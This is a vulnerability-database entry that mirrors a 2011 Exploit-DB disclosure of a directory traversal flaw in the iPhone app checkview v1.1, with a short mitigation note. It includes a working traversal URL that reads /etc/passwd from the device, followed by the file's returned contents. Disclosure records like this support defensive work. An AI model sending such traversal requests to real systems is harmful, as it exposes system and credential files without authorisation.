header-logo
Suggest Exploit
vendor:
checkview
by:
kim@story
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: checkview
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:checkview:checkview
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone, iPod 3GS with 4.2.1 firmware
2011

checkview(??) v1.1 for iPhone / iPod touch, Directory Traversal

There is directory traversal vulnerability in the checkview(??). Exploit Testing involves sending a crafted HTTP request to the vulnerable application, which can be used to access files outside the web root directory.

Mitigation:

Ensure that user input is validated and filtered before being used in file system operations. Use a whitelist of allowed characters and reject any input containing characters not on the whitelist.
Source

Exploit-DB raw data:

# Exploit Title: checkview(Ã¥ºä) v1.1 for iPhone / iPod touch, Directory Traversal
# Date: 03/14/2011
# Author: kim@story
# E-Mail : kimastory [at] gmail [dot] com
# Twitter : http://twitter.com/kimastory
# Software Link: http://itunes.apple.com/En/app/id381116321#
# Version: 1.1
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the checkview(Ã¥ºä).  
# Exploit Testing


http://192.168.0.18:8888/..%2F..%2F..%2F..%2F..%2F/etc/passwd


#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

Navigation

Suggest Exploit

Services By CQR